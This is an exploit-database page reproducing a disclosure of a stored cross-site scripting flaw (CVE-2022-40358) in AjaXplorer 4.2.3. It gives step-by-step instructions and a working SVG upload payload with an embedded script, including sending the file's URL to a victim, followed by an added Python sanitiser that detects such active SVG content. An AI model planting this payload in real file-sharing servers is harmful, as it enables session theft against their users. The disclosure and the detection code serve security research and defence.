AjaXplorer 4.2.3 - Stored Cross-Site Scripting (XSS)

CVE: CVE-2022-40358
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2022-09-22
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148


Our sensors found this exploit at:

Below is a copy:

# Exploit Title: AjaXplorer 4.2.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com'
# Vendor Homepage:
# Software Link:
# Version: 4.2.3
# Tested on: Linux, Windows
# CVE : CVE-2022-40358

An issue was discovered in AjaXplorer 4.2.3 that allows attackers to cause stored cross-site scripting via a crafted SVG file upload.

Steps to reproduce:

1. Right click > Create a new file > name file xss.svg
2. Right click on file > open in Source Editor
3. Copy paste below Payload and click save

<?xml version="1.0" standalone="no"?><svg width="1000" height="1000" version="1.1" xmlns=""><circle cx="50" cy="50" r="25" stroke="red" fill="transparent" stroke-width="50"/><script type="text/javascript">alert('XSS');</script></svg>

4. Right click file and open in external window for payload URL to send to victim
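A server-side check a defender can apply to uploaded SVG content before it is stored or served back, added here as an example that is not part of the advisory or of AjaXplorer. It parses the advisory's payload (embedded below as given on the page, with its empty xmlns) and rejects any SVG that carries script elements, event-handler attributes or javascript: URLs; Python's standard library is assumed, and the benign comparison document is constructed.

```python
import xml.etree.ElementTree as ET  # use defusedxml.ElementTree in production
from typing import List

# The payload from the advisory above, embedded as test input.
ADVISORY_PAYLOAD = (
    b'<?xml version="1.0" standalone="no"?><svg width="1000" height="1000" '
    b'version="1.1" xmlns=""><circle cx="50" cy="50" r="25" stroke="red" '
    b'fill="transparent" stroke-width="50"/><script type="text/javascript">'
    b"alert('XSS');</script></svg>"
)
# A constructed benign SVG in the standard W3C namespace, for comparison.
CLEAN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">'
    b'<circle cx="50" cy="50" r="25" fill="red"/></svg>'
)
# Elements that can run script or embed arbitrary HTML inside an SVG.
ACTIVE_ELEMENTS = {"script", "foreignObject"}


def svg_findings(data: bytes) -> List[str]:
    """Return the reasons an uploaded SVG must be rejected (empty means clean)."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings: List[str] = []
    for elem in root.iter():
        if not isinstance(elem.tag, str):  # skip comments / processing instructions
            continue
        # Drop any '{namespace}' prefix so '{http://www.w3.org/2000/svg}script'
        # and the bare 'script' from the advisory's xmlns="" payload both match.
        tag = elem.tag.rsplit("}", 1)[-1]
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for attr, value in elem.attrib.items():
            name = attr.rsplit("}", 1)[-1]
            if name.lower().startswith("on"):  # onload, onclick, ...
                findings.append(f"event handler {name} on <{tag}>")
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL in {name} on <{tag}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """True only when the document parses and carries no active content."""
    return not svg_findings(data)
```

Rejecting at upload time is only half the fix: files that are still served inline should also go out with `Content-Disposition: attachment` or under a Content-Security-Policy that disallows inline script.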

Copyright ©2024 Exploitalert.
